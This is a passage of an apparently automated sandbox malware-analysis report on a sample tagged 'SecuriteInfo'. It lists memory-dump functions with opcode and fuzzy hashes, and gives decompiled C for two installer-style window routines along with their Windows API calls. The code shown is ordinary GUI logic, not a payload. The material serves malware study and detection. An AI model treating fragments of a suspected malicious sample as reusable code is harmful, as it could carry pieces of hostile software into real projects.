                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ce3186686e7e5b7cedfca43944c82bf22447f92182e754cb973a84eff28d66c
                                                    • Instruction ID: bd28e192710e92c5e3b8f4aa70b8cc96cb51fac8004c142ac23bd6fd1bb20819
                                                    • Opcode Fuzzy Hash: 1ce3186686e7e5b7cedfca43944c82bf22447f92182e754cb973a84eff28d66c
                                                    • Instruction Fuzzy Hash: 9641DF3A024B155EC731CDA8D6862CA7F70AF363A1B7056348959FFA12F233020BCA56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332A154 Relevance: .2, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23d928572799e20c748bf1bc6cebe56d38024de24422d26c6aebd432d2163608
                                                    • Instruction ID: 53e46b3c9eb9e7d532892321a4f84d3a889dc26b7118b1be2d2e0f3779e5e5b2
                                                    • Opcode Fuzzy Hash: 23d928572799e20c748bf1bc6cebe56d38024de24422d26c6aebd432d2163608
                                                    • Instruction Fuzzy Hash: 2D611176A003899FDF349F68CCD87DB37A6AF99310F85812ADD4D8F200DB759A818B41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332DEFF Relevance: .2, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ad707d3c855db57e7a078777216c32d1a9987f638589da8f108367a368a16bf
                                                    • Instruction ID: cbbd7afc8b832de7aa855e9ac526ebd5ad9b871dfb358be1b6596227b91c4cca
                                                    • Opcode Fuzzy Hash: 1ad707d3c855db57e7a078777216c32d1a9987f638589da8f108367a368a16bf
                                                    • Instruction Fuzzy Hash: 855156BA50435A9FCB319E74899A3C63F75EF22394F988179CC9A9FA16D3310243CB01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332B254 Relevance: .2, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2aa404b6340db4902dc00e574988cf262518566d6dc58d8eae83910de66a5cf
                                                    • Instruction ID: e56d4698b195fec752273021f5e87316bf6a27d776cec9d3265408de6651dfc0
                                                    • Opcode Fuzzy Hash: f2aa404b6340db4902dc00e574988cf262518566d6dc58d8eae83910de66a5cf
                                                    • Instruction Fuzzy Hash: 1731383B114E045DC520DD78E6806DAFBF56E763A1F715A248A88FB212F23347478E9B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332DF54 Relevance: .2, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd412ca1e082403937971b146d4553f462bb39c921e20bd167f9c8a0f86bc606
                                                    • Instruction ID: 59ef9ab1489e6c3b9beddfdf37aa6cc92844d52207abef01bacf4c6ea72d2fa1
                                                    • Opcode Fuzzy Hash: bd412ca1e082403937971b146d4553f462bb39c921e20bd167f9c8a0f86bc606
                                                    • Instruction Fuzzy Hash: 1051367650836A9FDB319E74899A3C63B75EF12394F94817ACC969FA16D3324243CB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332D898 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bbf109781bc841f1da158cfd1cb1d8e8431709c89878fffbd5b0c811b099c33
                                                    • Instruction ID: bea001ae27de1c78b0a6a399e0ac41cbbc64f93722b0cfb1a0c54e65992c99c9
                                                    • Opcode Fuzzy Hash: 7bbf109781bc841f1da158cfd1cb1d8e8431709c89878fffbd5b0c811b099c33
                                                    • Instruction Fuzzy Hash: 52510070A013019FEB28DF39C998BDA77A5BF16360F844269DC968B2A1C730D981CF56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03325402 Relevance: .2, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4fc393800bb4eb7ff5864fbc15ba7f49b8f37d0b7ac79d43d802310fa7636b0
                                                    • Instruction ID: d30262ea3e0063b6ed11330b79dd69f0f2db30e706b92f61ce3564ecf24f9aaa
                                                    • Opcode Fuzzy Hash: e4fc393800bb4eb7ff5864fbc15ba7f49b8f37d0b7ac79d43d802310fa7636b0
                                                    • Instruction Fuzzy Hash: 89517735A003068FEF28DF7489E07E673E6AF56241F5A846EDC478B216D730D886CB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03329844 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72db0140884b6a6be01d93527907b0761dfec9be76ccfae7c4617bd6902d8ce5
                                                    • Instruction ID: 2d216e0417592ca72129e49d5540162ee4cc342bc15cc4506201e0f814498200
                                                    • Opcode Fuzzy Hash: 72db0140884b6a6be01d93527907b0761dfec9be76ccfae7c4617bd6902d8ce5
                                                    • Instruction Fuzzy Hash: 2F512576A40359DFDB309E158CA8BDF77A6AFD9390F854129DC8D9B214D3318A828B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332E11B Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d014bdd8d37c4144c2b5bc59524c94f4969e0f9b5d66835af513616133acd4a
                                                    • Instruction ID: 85bcdfa5d81c726a0f0588a8b92eb7455a011e7374045c42d5a55f07a413bfea
                                                    • Opcode Fuzzy Hash: 9d014bdd8d37c4144c2b5bc59524c94f4969e0f9b5d66835af513616133acd4a
                                                    • Instruction Fuzzy Hash: 314116765183669FDB329E6489963C23F31EF53394F5981A4CCA65FE16D3391443CB01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0333202C Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ccc9fe479828d34f1f9148de8f2bef2f1618db47e222905ec859794a7c43318
                                                    • Instruction ID: 115a47beaae85ed919ae62d548f3cbcf23ecc968583b040260c6eea898fea972
                                                    • Opcode Fuzzy Hash: 4ccc9fe479828d34f1f9148de8f2bef2f1618db47e222905ec859794a7c43318
                                                    • Instruction Fuzzy Hash: E301953A425C505DC120C9BCE6C15DAEBB5AA3B2A27342F644258FA646F127030BC9AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332E186 Relevance: .1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00745dc6faddbe185c63a842a0a1178f9b4e724d40f304f9f3fceb87c56e50f9
                                                    • Instruction ID: 6ef0a5463bc5e044bd67cc496628d116a8000df5b12489817db8521475fa8331
                                                    • Opcode Fuzzy Hash: 00745dc6faddbe185c63a842a0a1178f9b4e724d40f304f9f3fceb87c56e50f9
                                                    • Instruction Fuzzy Hash: C931047650436AAFDB369EB4855A3C23F32EF53394F9A8168CCA68EE17D33500478B01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332E5FD Relevance: .1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 97d2f7904a703ceec13895d094e721f62826b1bae74b299b8debff3d22d4d059
                                                    • Instruction ID: e305ad2d9b4d8315665b4566ad832083aaf73494f79b42df143a085f03021621
                                                    • Opcode Fuzzy Hash: 97d2f7904a703ceec13895d094e721f62826b1bae74b299b8debff3d22d4d059
                                                    • Instruction Fuzzy Hash: A5318835104351CFCF669F28CAE63D5BBA2EF16390F58C199CD898F21AD3348886CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03341447 Relevance: .1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c1409ebc9e28222b99e3625e240da6125a4b475cde5f7fca3eae9b7c825dc6a
                                                    • Instruction ID: 71d5265a080b5ce747c3e2df8cf69f870548b0ad42db1102072f44c290d40677
                                                    • Opcode Fuzzy Hash: 3c1409ebc9e28222b99e3625e240da6125a4b475cde5f7fca3eae9b7c825dc6a
                                                    • Instruction Fuzzy Hash: 1D21E235B0974A9FCB20DF78D9C47E663E2AF6A300B884159D84A8B705D37098C1CA45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03342671 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f30eb2c5e1287981c2caf42580d064743a30d21f67072b9854db91f50f70c9fa
                                                    • Instruction ID: fe6e993a4cb4fadcdb551f96e13a35343502b153b75d8a25818f99a2ab7a788d
                                                    • Opcode Fuzzy Hash: f30eb2c5e1287981c2caf42580d064743a30d21f67072b9854db91f50f70c9fa
                                                    • Instruction Fuzzy Hash: D2210131B007069FEB78AE3A8DA53DB36E7AF92610F81852EDCC6C7558D73591828606
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332A5E1 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 621a3267ad676e588bd5421578490f283267a3137e47520082993853f51c5e93
                                                    • Instruction ID: c4e2c2b82bd07daac872314827a02299d3649b16cc222493bfe0a7e20a632317
                                                    • Opcode Fuzzy Hash: 621a3267ad676e588bd5421578490f283267a3137e47520082993853f51c5e93
                                                    • Instruction Fuzzy Hash: A521F6356087558BDB7CCD288EF13EA72A6ABA13A0F89822E9C1B5B6C1CF7456018710
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03340817 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e154184cfdb9aab348166be8b1ee74c77fac2f52e64cb6dad9459eab445a385
                                                    • Instruction ID: e8a7565b4f66e3d196eccc276e13ead4a6153061035c8787b98a7bb4bb780ce8
                                                    • Opcode Fuzzy Hash: 5e154184cfdb9aab348166be8b1ee74c77fac2f52e64cb6dad9459eab445a385
                                                    • Instruction Fuzzy Hash: 8AB09238225740CFC249CB08C280F41B3B4BB04A40F810480EC028BA21C329E8008980
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404473 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00404473(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				short* _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216f4 =  *0x4216f4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040433D(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281e0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								ShellExecuteW(_a4, L"open", _v8, 0, 0, 1);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a248, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a248, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422700 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F8(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404706();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42921c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a278 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404424;
				if(_t110 != 2) {
					_v8 = E004043EA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004042D6(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004042D6(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F8( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040430B(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a250 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216f4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216f4 = 0;
				return 0;
			}


















                                                    0x00404485
                                                    0x004045b2
                                                    0x0040460f
                                                    0x00404613
                                                    0x004046e8
                                                    0x004046ea
                                                    0x004046ea
                                                    0x004046f0
                                                    0x004046f0
                                                    0x004046f3
                                                    0x00000000
                                                    0x004046fa
                                                    0x00404621
                                                    0x00404627
                                                    0x00404631
                                                    0x0040463c
                                                    0x0040463f
                                                    0x00404642
                                                    0x0040464d
                                                    0x00404650
                                                    0x00404657
                                                    0x00404664
                                                    0x00404675
                                                    0x0040468a
                                                    0x00404699
                                                    0x0040469f
                                                    0x0040469f
                                                    0x00404657
                                                    0x004046a9
                                                    0x00000000
                                                    0x004046b4
                                                    0x004046b8
                                                    0x004046c8
                                                    0x004046c8
                                                    0x004046ce
                                                    0x004046da
                                                    0x004046da
                                                    0x00000000
                                                    0x004046de
                                                    0x004046a9
                                                    0x004045bd
                                                    0x00000000
                                                    0x004045cf
                                                    0x004045d4
                                                    0x004045da
                                                    0x00000000
                                                    0x00000000
                                                    0x00404603
                                                    0x00404605
                                                    0x0040460a
                                                    0x00000000
                                                    0x0040460a
                                                    0x004045bd
                                                    0x0040448b
                                                    0x0040448e
                                                    0x00404493
                                                    0x004044a4
                                                    0x004044a4
                                                    0x004044ac
                                                    0x004044af
                                                    0x004044b3
                                                    0x004044b6
                                                    0x004044ba
                                                    0x004044bd
                                                    0x004044c0
                                                    0x004044c3
                                                    0x004044ca
                                                    0x004044cc
                                                    0x004044cc
                                                    0x004044d6
                                                    0x004044e3
                                                    0x004044ed
                                                    0x004044f2
                                                    0x004044f5
                                                    0x004044fa
                                                    0x00404511
                                                    0x00404518
                                                    0x0040452b
                                                    0x0040452e
                                                    0x00404542
                                                    0x00404549
                                                    0x0040454e
                                                    0x00404553
                                                    0x00404553
                                                    0x00404561
                                                    0x0040456f
                                                    0x00404581
                                                    0x00404586
                                                    0x00404596
                                                    0x00404598
                                                    0x00000000

                                                    APIs
                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404525
                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
                                                    • GetSysColor.USER32(?), ref: 00404553
                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
                                                    • lstrlenW.KERNEL32(?), ref: 00404574
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
                                                    • GetDlgItem.USER32(?,0000040A), ref: 004045EF
                                                    • SendMessageW.USER32(00000000), ref: 004045F6
                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404621
                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
                                                    • SetCursor.USER32(00000000), ref: 00404675
                                                    • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
                                                    • SetCursor.USER32(00000000), ref: 00404699
                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                    • String ID: Call$N$open$C@
                                                    • API String ID: 3615053054-3980584120
                                                    • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                    • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
                                                    • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                    • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a250;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                    0x0040100a
                                                    0x00401039
                                                    0x00401047
                                                    0x0040104d
                                                    0x00401051
                                                    0x0040105b
                                                    0x00401061
                                                    0x00401064
                                                    0x004010f3
                                                    0x00401089
                                                    0x0040108c
                                                    0x004010a6
                                                    0x004010bd
                                                    0x004010cc
                                                    0x004010cf
                                                    0x004010d5
                                                    0x004010d9
                                                    0x004010e4
                                                    0x004010ed
                                                    0x004010ef
                                                    0x004010ef
                                                    0x00401100
                                                    0x00401105
                                                    0x0040110d
                                                    0x00401110
                                                    0x00401112
                                                    0x00401118
                                                    0x0040111f
                                                    0x00401126
                                                    0x00401130
                                                    0x00401142
                                                    0x00401156
                                                    0x00401160
                                                    0x00401165
                                                    0x00401165
                                                    0x00401110
                                                    0x0040116e
                                                    0x00000000
                                                    0x00401178
                                                    0x00401010
                                                    0x00401013
                                                    0x00401015
                                                    0x0040101f
                                                    0x0040101f
                                                    0x00000000

                                                    APIs
                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                    • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
